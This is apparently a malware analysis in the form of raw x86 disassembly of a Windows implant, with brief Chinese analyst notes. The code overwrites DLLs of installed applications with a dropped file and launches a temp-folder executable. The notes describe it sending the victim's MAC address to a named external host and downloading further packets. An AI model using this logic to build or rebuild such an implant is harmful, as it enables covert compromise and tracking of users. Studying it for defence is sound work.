.nsp0:00401B51 mov edi, Sleep
.nsp0:00401B57 add esp, 10h
.nsp0:00401B5A
.nsp0:00401B5A loc_401B5A: ; CODE XREF: sub_401990+1EE�j
.nsp0:00401B5A cmp ebx, 32h
.nsp0:00401B5D jge short loc_401B82
.nsp0:00401B5F mov ecx, dword_40AAB0
.nsp0:00401B65 lea eax, [esp+228h+Source]
.nsp0:00401B69 push eax ; int
.nsp0:00401B6A push 64h ; lDistanceToMove
.nsp0:00401B6C push ecx ; lpFileName
.nsp0:00401B6D call sub_401690
.nsp0:00401B72 add esp, 0Ch
.nsp0:00401B75 mov esi, eax
.nsp0:00401B77 inc ebx
.nsp0:00401B78 push 0Ah ; dwMilliseconds
.nsp0:00401B7A call edi ; Sleep
.nsp0:00401B7C cmp esi, ebp
.nsp0:00401B7E jz short loc_401B5A
.nsp0:00401B80 jmp short loc_401B8A
.nsp0:00401B82 ; ---------------------------------------------------------------------------
.nsp0:00401B82
.nsp0:00401B82 loc_401B82: ; CODE XREF: sub_401990+1CD�j
.nsp0:00401B82 cmp esi, ebp
.nsp0:00401B84 jz loc_401E14 ; default
.nsp0:00401B8A
.nsp0:00401B8A loc_401B8A: ; CODE XREF: sub_401990+1F0�j
.nsp0:00401B8A lea edx, [esp+228h+Source]
.nsp0:00401B8E lea eax, [esp+228h+Str]
.nsp0:00401B92 push edx ; Source
.nsp0:00401B93 push eax ; Dest
.nsp0:00401B94 call _wcscat
.nsp0:00401B99 add esp, 8
.nsp0:00401B9C jmp loc_401E14 ; default
.nsp0:00401BA1 ; ---------------------------------------------------------------------------
.nsp0:00401BA1
.nsp0:00401BA1 loc_401BA1: ; CODE XREF: sub_401990+5E�j
.nsp0:00401BA1 ; DATA XREF: .nsp0:off_401E4C�o
.nsp0:00401BA1 mov ecx, dword_40AA9C ; jumptable 004019EE case 3
.nsp0:00401BA7 push 1 ; char
.nsp0:00401BA9 push ecx ; lpFileName
.nsp0:00401BAA call sub_401960
.nsp0:00401BAF add esp, 8
.nsp0:00401BB2 test al, al
.nsp0:00401BB4 jz loc_401E14 ; default
.nsp0:00401BBA mov edx, dword_40AA9C
.nsp0:00401BC0 lea eax, [esp+228h+Str]
.nsp0:00401BC4 push edx ; Source
.nsp0:00401BC5 push eax ; Dest
.nsp0:00401BC6 call _wcscat
.nsp0:00401BCB mov ecx, dword_40AA9C
.nsp0:00401BD1 push offset aSkmsg_dll ; "\\skmsg.dll"
.nsp0:00401BD6 push ecx ; Dest
.nsp0:00401BD7 call _wcscat
.nsp0:00401BDC mov edi, Sleep
.nsp0:00401BE2 add esp, 10h
.nsp0:00401BE5
.nsp0:00401BE5 loc_401BE5: ; CODE XREF: sub_401990+27C�j
.nsp0:00401BE5 cmp ebx, 32h
.nsp0:00401BE8 jge loc_401C7B
.nsp0:00401BEE mov eax, dword_40AA9C
.nsp0:00401BF3 lea edx, [esp+228h+Source]
.nsp0:00401BF7 push edx ; int
.nsp0:00401BF8 push 64h ; lDistanceToMove
.nsp0:00401BFA push eax ; lpFileName
.nsp0:00401BFB call sub_401690
.nsp0:00401C00 add esp, 0Ch
.nsp0:00401C03 mov esi, eax
.nsp0:00401C05 inc ebx
.nsp0:00401C06 push 0Ah ; dwMilliseconds
.nsp0:00401C08 call edi ; Sleep
.nsp0:00401C0A cmp esi, ebp
.nsp0:00401C0C jz short loc_401BE5
.nsp0:00401C0E jmp short loc_401C83
.nsp0:00401C10 ; ---------------------------------------------------------------------------
.nsp0:00401C10
.nsp0:00401C10 loc_401C10: ; CODE XREF: sub_401990+5E�j
.nsp0:00401C10 ; DATA XREF: .nsp0:off_401E4C�o
.nsp0:00401C10 mov ecx, dword_40AA98 ; jumptable 004019EE case 4
.nsp0:00401C16 push 1 ; char
.nsp0:00401C18 push ecx ; lpFileName
.nsp0:00401C19 call sub_401960
.nsp0:00401C1E add esp, 8
.nsp0:00401C21 test al, al
.nsp0:00401C23 jz loc_401E14 ; default
.nsp0:00401C29 mov edx, dword_40AA98
.nsp0:00401C2F lea eax, [esp+228h+Str]
.nsp0:00401C33 push edx ; Source
.nsp0:00401C34 push eax ; Dest
.nsp0:00401C35 call _wcscat
.nsp0:00401C3A mov ecx, dword_40AA98
.nsp0:00401C40 push offset aMedia2_dll ; "\\Media2.dll"
.nsp0:00401C45 push ecx ; Dest
.nsp0:00401C46 call _wcscat
.nsp0:00401C4B mov edi, Sleep
.nsp0:00401C51 add esp, 10h
.nsp0:00401C54
.nsp0:00401C54 loc_401C54: ; CODE XREF: sub_401990+2E7�j
.nsp0:00401C54 cmp ebx, 32h
.nsp0:00401C57 jge short loc_401C7B
.nsp0:00401C59 mov eax, dword_40AA98
.nsp0:00401C5E lea edx, [esp+228h+Source]
.nsp0:00401C62 push edx ; int
.nsp0:00401C63 push 64h ; lDistanceToMove
.nsp0:00401C65 push eax ; lpFileName
.nsp0:00401C66 call sub_401690
.nsp0:00401C6B add esp, 0Ch
.nsp0:00401C6E mov esi, eax
.nsp0:00401C70 inc ebx
.nsp0:00401C71 push 0Ah ; dwMilliseconds
.nsp0:00401C73 call edi ; Sleep
.nsp0:00401C75 cmp esi, ebp
.nsp0:00401C77 jz short loc_401C54
.nsp0:00401C79 jmp short loc_401C83
.nsp0:00401C7B ; ---------------------------------------------------------------------------
.nsp0:00401C7B
.nsp0:00401C7B loc_401C7B: ; CODE XREF: sub_401990+258�j
.nsp0:00401C7B ; sub_401990+2C7�j
.nsp0:00401C7B cmp esi, ebp
.nsp0:00401C7D jz loc_401E14 ; default
.nsp0:00401C83
.nsp0:00401C83 loc_401C83: ; CODE XREF: sub_401990+27E�j
.nsp0:00401C83 ; sub_401990+2E9�j
.nsp0:00401C83 lea ecx, [esp+228h+Str]
.nsp0:00401C87 push offset word_4084A0 ; Source
.nsp0:00401C8C push ecx ; Dest
.nsp0:00401C8D call _wcscat
.nsp0:00401C92 lea edx, [esp+230h+Source]
.nsp0:00401C96 lea eax, [esp+230h+Str]
.nsp0:00401C9A push edx
.nsp0:00401C9B push eax
.nsp0:00401C9C jmp loc_401E0C
.nsp0:00401CA1 ; ---------------------------------------------------------------------------
.nsp0:00401CA1
.nsp0:00401CA1 loc_401CA1: ; CODE XREF: sub_401990+5E�j
.nsp0:00401CA1 ; DATA XREF: .nsp0:off_401E4C�o
.nsp0:00401CA1 mov ecx, dword_40AA90 ; jumptable 004019EE case 5
.nsp0:00401CA7 push 1 ; char
.nsp0:00401CA9 push ecx ; lpFileName
.nsp0:00401CAA call sub_401960
.nsp0:00401CAF add esp, 8
.nsp0:00401CB2 test al, al
.nsp0:00401CB4 jz loc_401E14 ; default
.nsp0:00401CBA mov edx, dword_40AA90
.nsp0:00401CC0 lea eax, [esp+228h+Str]
.nsp0:00401CC4 push edx ; Source
.nsp0:00401CC5 push eax ; Dest
.nsp0:00401CC6 call _wcscat
.nsp0:00401CCB mov ecx, dword_40AA90
.nsp0:00401CD1 mov edx, Dest
.nsp0:00401CD7 push ecx ; Source
.nsp0:00401CD8 push edx ; Dest
.nsp0:00401CD9 call _wcscat
.nsp0:00401CDE mov eax, dword_40AA90
.nsp0:00401CE3 push offset a1_1_0_2640Fds_ ; "\\1.1.0.2640\\fds.dll"
.nsp0:00401CE8 push eax ; Dest
.nsp0:00401CE9 call _wcscat
.nsp0:00401CEE mov ecx, Dest
.nsp0:00401CF4 push offset aFds_dll ; "\\fds.dll"
.nsp0:00401CF9 push ecx ; Dest
.nsp0:00401CFA call _wcscat
.nsp0:00401CFF mov ebp, Sleep
.nsp0:00401D05 add esp, 20h
.nsp0:00401D08
.nsp0:00401D08 loc_401D08: ; CODE XREF: sub_401990+39B�j
.nsp0:00401D08 cmp ebx, 32h
.nsp0:00401D0B jge short loc_401D2F
.nsp0:00401D0D mov eax, dword_40AA90
.nsp0:00401D12 lea edx, [esp+228h+Source]
.nsp0:00401D16 push edx ; int
.nsp0:00401D17 push 64h ; lDistanceToMove
.nsp0:00401D19 push eax ; lpFileName
.nsp0:00401D1A call sub_401690
.nsp0:00401D1F add esp, 0Ch
.nsp0:00401D22 mov esi, eax
.nsp0:00401D24 inc ebx
.nsp0:00401D25 push 0Ah ; dwMilliseconds
.nsp0:00401D27 call ebp ; Sleep
.nsp0:00401D29 test esi, esi
.nsp0:00401D2B jz short loc_401D08
.nsp0:00401D2D jmp short loc_401D37
.nsp0:00401D2F ; ---------------------------------------------------------------------------
.nsp0:00401D2F
.nsp0:00401D2F loc_401D2F: ; CODE XREF: sub_401990+37B�j
.nsp0:00401D2F test esi, esi
.nsp0:00401D31 jz loc_401E14 ; default
.nsp0:00401D37
.nsp0:00401D37 loc_401D37: ; CODE XREF: sub_401990+39D�j
.nsp0:00401D37 lea ecx, [esp+228h+Str]
.nsp0:00401D3B push offset word_4084A0 ; Source
.nsp0:00401D40 push ecx ; Dest
.nsp0:00401D41 xor edi, edi
.nsp0:00401D43 call _wcscat
.nsp0:00401D48 lea edx, [esp+230h+Source]
.nsp0:00401D4C lea eax, [esp+230h+Str]
.nsp0:00401D50 push edx ; Source
.nsp0:00401D51 push eax ; Dest
.nsp0:00401D52 call _wcscat
.nsp0:00401D57 add esp, 10h
.nsp0:00401D5A
.nsp0:00401D5A loc_401D5A: ; CODE XREF: sub_401990+3F2�j
.nsp0:00401D5A cmp edi, 32h
.nsp0:00401D5D jge loc_401E14 ; default
.nsp0:00401D63 mov edx, Dest
.nsp0:00401D69 lea ecx, [esp+228h+Source]
.nsp0:00401D6D push ecx ; int
.nsp0:00401D6E push 64h ; lDistanceToMove
.nsp0:00401D70 push edx ; lpFileName
.nsp0:00401D71 call sub_401690
.nsp0:00401D76 add esp, 0Ch
.nsp0:00401D79 mov esi, eax
.nsp0:00401D7B inc edi
.nsp0:00401D7C push 0Ah ; dwMilliseconds
.nsp0:00401D7E call ebp ; Sleep
.nsp0:00401D80 test esi, esi
.nsp0:00401D82 jz short loc_401D5A
.nsp0:00401D84 jmp loc_401E14 ; default
.nsp0:00401D89 ; ---------------------------------------------------------------------------
.nsp0:00401D89
.nsp0:00401D89 loc_401D89: ; CODE XREF: sub_401990+5E�j
.nsp0:00401D89 ; DATA XREF: .nsp0:off_401E4C�o
.nsp0:00401D89 mov eax, dword_40AA94 ; jumptable 004019EE case 6
.nsp0:00401D8E push 1 ; char
.nsp0:00401D90 push eax ; lpFileName
.nsp0:00401D91 call sub_401960
.nsp0:00401D96 add esp, 8
.nsp0:00401D99 test al, al
.nsp0:00401D9B jz short loc_401E14 ; default
.nsp0:00401D9D mov ecx, dword_40AA94
.nsp0:00401DA3 lea edx, [esp+228h+Str]
.nsp0:00401DA7 push ecx ; Source
.nsp0:00401DA8 push edx ; Dest
.nsp0:00401DA9 call _wcscat
.nsp0:00401DAE mov eax, dword_40AA94
.nsp0:00401DB3 push offset aProgramBugrepo ; "\\Program\\BugReport.dll"
.nsp0:00401DB8 push eax ; Dest
.nsp0:00401DB9 call _wcscat
.nsp0:00401DBE mov edi, Sleep
.nsp0:00401DC4 add esp, 10h
.nsp0:00401DC7
.nsp0:00401DC7 loc_401DC7: ; CODE XREF: sub_401990+45B�j
.nsp0:00401DC7 cmp ebx, 32h
.nsp0:00401DCA jge short loc_401DEF
.nsp0:00401DCC mov edx, dword_40AA94
.nsp0:00401DD2 lea ecx, [esp+228h+Source]
.nsp0:00401DD6 push ecx ; int
.nsp0:00401DD7 push 64h ; lDistanceToMove
.nsp0:00401DD9 push edx ; lpFileName
.nsp0:00401DDA call sub_401690
.nsp0:00401DDF add esp, 0Ch
.nsp0:00401DE2 mov esi, eax
.nsp0:00401DE4 inc ebx
.nsp0:00401DE5 push 0Ah ; dwMilliseconds
.nsp0:00401DE7 call edi ; Sleep
.nsp0:00401DE9 cmp esi, ebp
.nsp0:00401DEB jz short loc_401DC7
.nsp0:00401DED jmp short loc_401DF3
.nsp0:00401DEF ; ---------------------------------------------------------------------------
.nsp0:00401DEF
.nsp0:00401DEF loc_401DEF: ; CODE XREF: sub_401990+43A�j
.nsp0:00401DEF cmp esi, ebp
.nsp0:00401DF1 jz short loc_401E14 ; default
.nsp0:00401DF3
.nsp0:00401DF3 loc_401DF3: ; CODE XREF: sub_401990+45D�j
.nsp0:00401DF3 lea eax, [esp+228h+Str]
.nsp0:00401DF7 push offset aProgram ; "\\Program\"
.nsp0:00401DFC push eax ; Dest
.nsp0:00401DFD call _wcscat
.nsp0:00401E02 lea ecx, [esp+230h+Source]
.nsp0:00401E06 lea edx, [esp+230h+Str]
.nsp0:00401E0A push ecx ; Source
.nsp0:00401E0B push edx ; Dest
.nsp0:00401E0C
.nsp0:00401E0C loc_401E0C: ; CODE XREF: sub_401990+F1�j
.nsp0:00401E0C ; sub_401990+182�j ...
.nsp0:00401E0C call _wcscat
.nsp0:00401E11 add esp, 10h
.nsp0:00401E14
.nsp0:00401E14 loc_401E14: ; CODE XREF: sub_401990+58�j
.nsp0:00401E14 ; sub_401990+78�j ...
.nsp0:00401E14 lea eax, [esp+228h+Str] ; default
.nsp0:00401E18 push eax ; Str
.nsp0:00401E19 call _wcslen
.nsp0:00401E1E add esp, 4
.nsp0:00401E21 test eax, eax
.nsp0:00401E23 pop edi
.nsp0:00401E24 pop esi
.nsp0:00401E25 pop ebp
.nsp0:00401E26 pop ebx
.nsp0:00401E27 jbe short loc_401E42
.nsp0:00401E29 lea ecx, [esp+218h+Str]
.nsp0:00401E2D push 1 ; bFailIfExists
.nsp0:00401E2F push ecx ; lpNewFileName
.nsp0:00401E30 push offset aCWindowsTempPl ; "C:\\WINDOWS\\temp\\playList0.dat"
.nsp0:00401E35 call CopyFileW
.nsp0:00401E3B add esp, 218h
.nsp0:00401E41 retn
.nsp0:00401E42 ; ---------------------------------------------------------------------------
.nsp0:00401E42
.nsp0:00401E42 loc_401E42: ; CODE XREF: sub_401990+497�j
.nsp0:00401E42 xor eax, eax
.nsp0:00401E44 add esp, 218h
.nsp0:00401E4A retn
.nsp0:00401E4A sub_401990 endp
.nsp0:004020CE push offset aCWindowsTempPl ; "C:\\WINDOWS\\temp\\playList0.dat"
.nsp0:004020D3 call DeleteFileW
.nsp0:00402106 push 0 ; nShowCmd
.nsp0:00402108 lea edx, [esp+224h+Parameters]
.nsp0:0040210C push 0 ; lpDirectory
.nsp0:0040210E push edx ; lpParameters
.nsp0:0040210F push offset FileName ; "C:\\WINDOWS\\temp\\uninstaller.exe"
.nsp0:00402114 push offset Operation ; "open"
.nsp0:00402119 push 0 ; hwnd
.nsp0:0040211B call ShellExecuteW
一:先解密 加密的字符串
baidu.51ddd.com
C:\\WINDOWS\\system32\\Com\\comreat.mml
/tongji/tongji.asp?id=2&mac=
/rising.txt
/rising/.nsp0:10001100 push edi
.nsp0:10001101 push 200h ; unsigned int
.nsp0:10001106 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:1000110B push 200h ; unsigned int
.nsp0:10001110 mov lpszServerName, eax
.nsp0:10001115 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:1000111A push 200h ; unsigned int
.nsp0:1000111F mov pszPath, eax
.nsp0:10001124 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:10001129 push 200h ; unsigned int
.nsp0:1000112E mov lpszObjectName, eax
.nsp0:10001133 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:10001138 push 200h ; unsigned int
.nsp0:1000113D mov dword_1000AF14, eax
.nsp0:10001142 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:10001147 push 1000h ; unsigned int
.nsp0:1000114C mov dword_1000AF10, eax
.nsp0:10001151 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:10001156 mov edi, eax
.nsp0:10001158 mov ecx, 400h
.nsp0:1000115D xor eax, eax
.nsp0:1000115F mov dword_1000AF30, edi
.nsp0:10001165 rep stosd
.nsp0:10001167 push 1000h ; unsigned int
.nsp0:1000116C call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:10001171 mov edi, eax
.nsp0:10001173 mov ecx, 400h
.nsp0:10001178 xor eax, eax
.nsp0:1000117A mov dword_1000AF2C, edi
.nsp0:10001180 rep stosd
.nsp0:10001182 push 1000h ; unsigned int
.nsp0:10001187 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:1000118C mov edi, eax
.nsp0:1000118E mov ecx, 400h
.nsp0:10001193 xor eax, eax
.nsp0:10001195 mov dword_1000AF28, edi
.nsp0:1000119B rep stosd
.nsp0:1000119D push 6800h ; unsigned int
.nsp0:100011A2 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:100011A7 mov edi, eax
.nsp0:100011A9 mov ecx, 1A00h
.nsp0:100011AE xor eax, eax
.nsp0:100011B0 mov dword_1000AF24, edi
.nsp0:100011B6 rep stosd
.nsp0:100011B8 mov eax, lpszServerName
.nsp0:100011BD push eax ; int
.nsp0:100011BE push offset Str ; Str
.nsp0:100011C3 call sub_10001000
.nsp0:100011C8 mov ecx, pszPath
.nsp0:100011CE push ecx ; int
.nsp0:100011CF push offset aQwX ; "~qw}x~"
.nsp0:100011D4 call sub_10001000
.nsp0:100011D9 mov edx, lpszObjectName
.nsp0:100011DF push edx ; int
.nsp0:100011E0 push offset asc_1000A148 ; "|}"
.nsp0:100011E5 call sub_10001000
.nsp0:100011EA mov eax, dword_1000AF10
.nsp0:100011EF push eax ; int
.nsp0:100011F0 push offset asc_1000A228 ; "|}"
.nsp0:100011F5 call sub_10001000
.nsp0:100011FA mov ecx, dword_1000AF14
.nsp0:10001200 add esp, 44h
.nsp0:10001203 push ecx ; int
.nsp0:10001204 push offset asc_1000A1F4 ; "|}"
.nsp0:10001209 call sub_10001000
.nsp0:1000120E add esp, 8
.nsp0:10001211 pop edi
.nsp0:10001212 retn
1:调用GetAdaptersInfo获得MAC地址, 把获取的信息发送到http://baidu.51ddd.com/tongji/tongji.asp?id=2&mac=.nsp0:10001395 push ebp ; dwFlags
.nsp0:10001396 push ebp ; lpszProxyBypass
.nsp0:10001397 push ebp ; lpszProxy
.nsp0:10001398 push ebp ; dwAccessType
.nsp0:10001399 push offset szAgent ; "http generic"
.nsp0:1000139E call InternetOpenW
.nsp0:100013A4 cmp eax, ebp
.nsp0:100013A6 pop ebx
.nsp0:100013A7 jz short loc_10001425
.nsp0:100013A9 mov ecx, lpszServerName
.nsp0:100013AF push ebp ; dwContext
.nsp0:100013B0 push ebp ; dwFlags
.nsp0:100013B1 push 3 ; dwService
.nsp0:100013B3 push offset szPassword ; "HTTP/1.0"
.nsp0:100013B8 push ebp ; lpszUserName
.nsp0:100013B9 push 50h ; nServerPort
.nsp0:100013BB push ecx ; lpszServerName
.nsp0:100013BC push eax ; hInternet
.nsp0:100013BD call InternetConnectW
.nsp0:100013C3 cmp eax, ebp
.nsp0:100013C5 jz short loc_10001425
.nsp0:100013C7 mov edx, lpszObjectName
.nsp0:100013CD push ebp ; dwContext
.nsp0:100013CE push 80000000h ; dwFlags
.nsp0:100013D3 push ebp ; lplpszAcceptTypes
.nsp0:100013D4 push ebp ; lpszReferrer
.nsp0:100013D5 push offset szPassword ; "HTTP/1.0"
.nsp0:100013DA push edx ; lpszObjectName
.nsp0:100013DB push offset szVerb ; "GET"
.nsp0:100013E0 push eax ; hConnect
.nsp0:100013E1 call HttpOpenRequestW
.nsp0:100013E7 mov esi, eax
.nsp0:100013E9 cmp esi, ebp
.nsp0:100013EB jz short loc_10001425
.nsp0:100013ED lea eax, [esp+9Ch+szHeaders]
.nsp0:100013F1 push 0A0000000h ; dwModifiers
.nsp0:100013F6 push eax ; Str
.nsp0:100013F7 call _wcslen
.nsp0:100013FC add esp, 4
.nsp0:100013FF lea ecx, [esp+0A0h+szHeaders]
.nsp0:10001403 push eax ; dwHeadersLength
.nsp0:10001404 push ecx ; lpszHeaders
.nsp0:10001405 push esi ; hRequest
.nsp0:10001406 call HttpAddRequestHeadersW
.nsp0:1000140C test eax, eax
.nsp0:1000140E jz short loc_10001425
.nsp0:10001410 push ebp ; dwOptionalLength
.nsp0:10001411 push ebp ; lpOptional
.nsp0:10001412 push ebp ; dwHeadersLength
.nsp0:10001413 push ebp ; lpszHeaders
.nsp0:10001414 push esi ; hRequest
.nsp0:10001415 call HttpSendRequestW
.nsp0:1000141B pop edi
.nsp0:1000141C pop esi
.nsp0:1000141D pop ebp
.nsp0:1000141E add esp, 90h
.nsp0:10001424 retn
.nsp0:10001425 ; ---------------------------------------------------------------------------
.nsp0:10001425
.nsp0:10001425 loc_10001425: ; CODE XREF: sub_100012C0+4E�j
.nsp0:10001425 ; sub_100012C0+E7�j ...
.nsp0:10001425 pop edi
.nsp0:10001426 pop esi
.nsp0:10001427 xor eax, eax
.nsp0:10001429 pop ebp
.nsp0:1000142A add esp, 90h
.nsp0:10001430 retn
.nsp0:10001540 sub esp, 610h
.nsp0:10001546 push ebx
.nsp0:10001547 xor ebx, ebx
.nsp0:10001549 push ebx ; dwFlags
.nsp0:1000154A push ebx ; lpszProxyBypass
.nsp0:1000154B push ebx ; lpszProxy
.nsp0:1000154C push ebx ; dwAccessType
.nsp0:1000154D push offset aDownloadpacket ; "DownLoadPacket"
.nsp0:10001552 call InternetOpenW
.nsp0:10001558 cmp eax, ebx
.nsp0:1000155A mov hInternet, eax
.nsp0:1000155F jz loc_100016EA
.nsp0:10001565 push edi
.nsp0:10001566 mov ecx, 7Fh
.nsp0:1000156B xor eax, eax
.nsp0:1000156D lea edi, [esp+618h+var_5FE]
.nsp0:10001571 mov [esp+618h+szUrl], bx
.nsp0:10001576 push offset Source ; "http://"
.nsp0:1000157B rep stosd
.nsp0:1000157D stosw
.nsp0:1000157F lea eax, [esp+61Ch+szUrl]
.nsp0:10001583 push eax ; Dest
.nsp0:10001584 call _wcscat
.nsp0:10001589 mov ecx, lpszServerName
.nsp0:1000158F lea edx, [esp+620h+szUrl]
.nsp0:10001593 push ecx ; Source
.nsp0:10001594 push edx ; Dest
.nsp0:10001595 call _wcscat
.nsp0:1000159A mov eax, dword_1000AF10
.nsp0:1000159F lea ecx, [esp+628h+szUrl]
.nsp0:100015A3 push eax ; Source
.nsp0:100015A4 push ecx ; Dest
.nsp0:100015A5 call _wcscat
.nsp0:100015AA mov eax, hInternet
.nsp0:100015AF add esp, 18h
.nsp0:100015B2 lea edx, [esp+618h+szUrl]
.nsp0:100015B6 push ebx ; dwContext
.nsp0:100015B7 push 84000100h ; dwFlags
.nsp0:100015BC push ebx ; dwHeadersLength
.nsp0:100015BD push ebx ; lpszHeaders
.nsp0:100015BE push edx ; lpszUrl
.nsp0:100015BF push eax ; hInternet
.nsp0:100015C0 call InternetOpenUrlW
.nsp0:100015C6 mov edx, eax
.nsp0:100015C8 cmp edx, ebx
.nsp0:100015CA mov dword_1000AF34, edx
.nsp0:100015D0 jz loc_100016D6
.nsp0:100015D6 mov ecx, 0FFh
.nsp0:100015DB xor eax, eax
.nsp0:100015DD lea edi, [esp+618h+var_3FF]
.nsp0:100015E4 mov [esp+618h+Buffer], bl
.nsp0:100015EB rep stosd
.nsp0:100015ED stosw
.nsp0:100015EF lea ecx, [esp+618h+dwNumberOfBytesRead]
.nsp0:100015F3 stosb
.nsp0:100015F4 push ecx ; lpdwNumberOfBytesRead
.nsp0:100015F5 lea eax, [esp+61Ch+Buffer]
.nsp0:100015FC push 400h ; dwNumberOfBytesToRead
.nsp0:10001601 push eax ; lpBuffer
.nsp0:10001602 push edx ; hFile
.nsp0:10001603 call InternetReadFile
.nsp0:10001609 test eax, eax
.nsp0:1000160B jz loc_100016C3
.nsp0:10001611 lea ecx, [esp+618h+Buffer]
.nsp0:10001618 push offset SubStr ; "<HEAD>"
.nsp0:1000161D push ecx ; Str
.nsp0:1000161E call _strstr
.nsp0:10001623 add esp, 8
.nsp0:10001626 test eax, eax
.nsp0:10001628 jnz loc_100016C3
.nsp0:1000162E cmp [esp+618h+dwNumberOfBytesRead], ebx
.nsp0:10001632 jbe loc_100016C3
.nsp0:10001638 push ebp
.nsp0:10001639 lea edx, [esp+61Ch+Buffer]
.nsp0:10001640 push offset Delim ; "\r\n"
.nsp0:10001645 push edx ; Str
.nsp0:10001646 xor ebp, ebp
.nsp0:10001648 call _strtok
.nsp0:1000164D mov edx, eax
.nsp0:1000164F add esp, 8
.nsp0:10001652 cmp edx, ebx
.nsp0:10001654 jz short loc_100016BA
.nsp0:10001656 push esi
.nsp0:10001657
.nsp0:10001657 loc_10001657: ; CODE XREF: sub_10001540+177�j
.nsp0:10001657 xor eax, eax
.nsp0:10001659 mov edi, edx
.nsp0:1000165B mov [esp+620h+var_60F], eax
.nsp0:1000165F or ecx, 0FFFFFFFFh
.nsp0:10001662 mov [esp+620h+var_60B], eax
.nsp0:10001666 mov [esp+620h+var_610], bl
.nsp0:1000166A mov [esp+620h+var_607], al
.nsp0:1000166E xor esi, esi
.nsp0:10001670 repne scasb
.nsp0:10001672 not ecx
.nsp0:10001674 dec ecx
.nsp0:10001675 cmp ecx, ebx
.nsp0:10001677 jle short loc_10001691
.nsp0:10001679 lea edi, [esp+620h+var_610]
.nsp0:1000167D mov eax, edx
.nsp0:1000167F sub edi, edx
.nsp0:10001681
.nsp0:10001681 loc_10001681: ; CODE XREF: sub_10001540+14F�j
.nsp0:10001681 mov dl, [eax]
.nsp0:10001683 cmp dl, 2Eh
.nsp0:10001686 jz short loc_10001691
.nsp0:10001688 mov [edi+eax], dl
.nsp0:1000168B inc esi
.nsp0:1000168C inc eax
.nsp0:1000168D cmp esi, ecx
.nsp0:1000168F jl short loc_10001681
.nsp0:10001691
.nsp0:10001691 loc_10001691: ; CODE XREF: sub_10001540+137�j
.nsp0:10001691 ; sub_10001540+146�j
.nsp0:10001691 lea ecx, [esp+620h+var_610]
.nsp0:10001695 push ecx
.nsp0:10001696 call sub_10002011
.nsp0:1000169B mov edx, dword_1000AF30
.nsp0:100016A1 push offset Delim ; "\r\n"
.nsp0:100016A6 push ebx ; Str
.nsp0:100016A7 mov [edx+ebp*4], eax
.nsp0:100016AA call _strtok
.nsp0:100016AF add esp, 0Ch
.nsp0:100016B2 mov edx, eax
.nsp0:100016B4 inc ebp
.nsp0:100016B5 cmp edx, ebx
.nsp0:100016B7 jnz short loc_10001657
.nsp0:100016B9 pop esi
.nsp0:100016BA
.nsp0:100016BA loc_100016BA: ; CODE XREF: sub_10001540+114�j
.nsp0:100016BA mov eax, dword_1000AF30
.nsp0:100016BF mov [eax+ebp*4], ebx
.nsp0:100016C2 pop ebp
.nsp0:100016C3
.nsp0:100016C3 loc_100016C3: ; CODE XREF: sub_10001540+CB�j
.nsp0:100016C3 ; sub_10001540+E8�j ...
.nsp0:100016C3 mov ecx, dword_1000AF34
.nsp0:100016C9 push ecx ; hInternet
.nsp0:100016CA call InternetCloseHandle
.nsp0:100016D0 mov dword_1000AF34, ebx
.nsp0:100016D6
.nsp0:100016D6 loc_100016D6: ; CODE XREF: sub_10001540+90�j
.nsp0:100016D6 mov edx, hInternet
.nsp0:100016DC push edx ; hInternet
.nsp0:100016DD call InternetCloseHandle
.nsp0:100016E3 mov hInternet, ebx
.nsp0:100016E9 pop edi
.nsp0:100016EA
.nsp0:100016EA loc_100016EA: ; CODE XREF: sub_10001540+1F�j
.nsp0:100016EA pop ebx
.nsp0:100016EB add esp, 610h
.nsp0:100016F1 retn
.nsp0:10001440 push ecx
.nsp0:10001441 mov eax, pszPath
.nsp0:10001446 push edi
.nsp0:10001447 push eax ; pszPath
.nsp0:10001448 call PathFileExistsW
.nsp0:1000144E test eax, eax
.nsp0:10001450 push 0 ; hTemplateFile
.nsp0:10001452 push 80h ; dwFlagsAndAttributes
.nsp0:10001457 jz loc_1000150B
.nsp0:1000145D mov ecx, pszPath
.nsp0:10001463 push 3 ; dwCreationDisposition
.nsp0:10001465 push 0 ; lpSecurityAttributes
.nsp0:10001467 push 2 ; dwShareMode
.nsp0:10001469 push 80000000h ; dwDesiredAccess
.nsp0:1000146E push ecx ; lpFileName
.nsp0:1000146F call CreateFileW
.nsp0:10001475 mov edi, eax
.nsp0:10001477 cmp edi, 0FFFFFFFFh
.nsp0:1000147A jnz short loc_10001481
.nsp0:1000147C xor eax, eax
.nsp0:1000147E pop edi
.nsp0:1000147F pop ecx
.nsp0:10001480 retn
.nsp0:10001481 ; ---------------------------------------------------------------------------
.nsp0:10001481
.nsp0:10001481 loc_10001481: ; CODE XREF: sub_10001440+3A�j
.nsp0:10001481 push ebx
.nsp0:10001482 push esi
.nsp0:10001483 push 0 ; lpFileSizeHigh
.nsp0:10001485 push edi ; hFile
.nsp0:10001486 call GetFileSize
.nsp0:1000148C mov esi, eax
.nsp0:1000148E push esi ; Size
.nsp0:1000148F call _malloc
.nsp0:10001494 add esp, 4
.nsp0:10001497 lea edx, [esp+10h+NumberOfBytesRead]
.nsp0:1000149B mov ebx, eax
.nsp0:1000149D push 0 ; lpOverlapped
.nsp0:1000149F push edx ; lpNumberOfBytesRead
.nsp0:100014A0 push esi ; nNumberOfBytesToRead
.nsp0:100014A1 push ebx ; lpBuffer
.nsp0:100014A2 push edi ; hFile
.nsp0:100014A3 call ReadFile
.nsp0:100014A9 test eax, eax
.nsp0:100014AB jz short loc_100014F1
.nsp0:100014AD push offset Delim ; "\r\n"
.nsp0:100014B2 push ebx ; Str
.nsp0:100014B3 call _strtok
.nsp0:100014B8 add esp, 8
.nsp0:100014BB xor esi, esi
.nsp0:100014BD test eax, eax
.nsp0:100014BF jz short loc_100014E4
.nsp0:100014C1
.nsp0:100014C1 loc_100014C1: ; CODE XREF: sub_10001440+A2�j
.nsp0:100014C1 push eax
.nsp0:100014C2 call sub_10002011
.nsp0:100014C7 mov ecx, dword_1000AF2C
.nsp0:100014CD push offset Delim ; "\r\n"
.nsp0:100014D2 push 0 ; Str
.nsp0:100014D4 mov [ecx+esi*4], eax
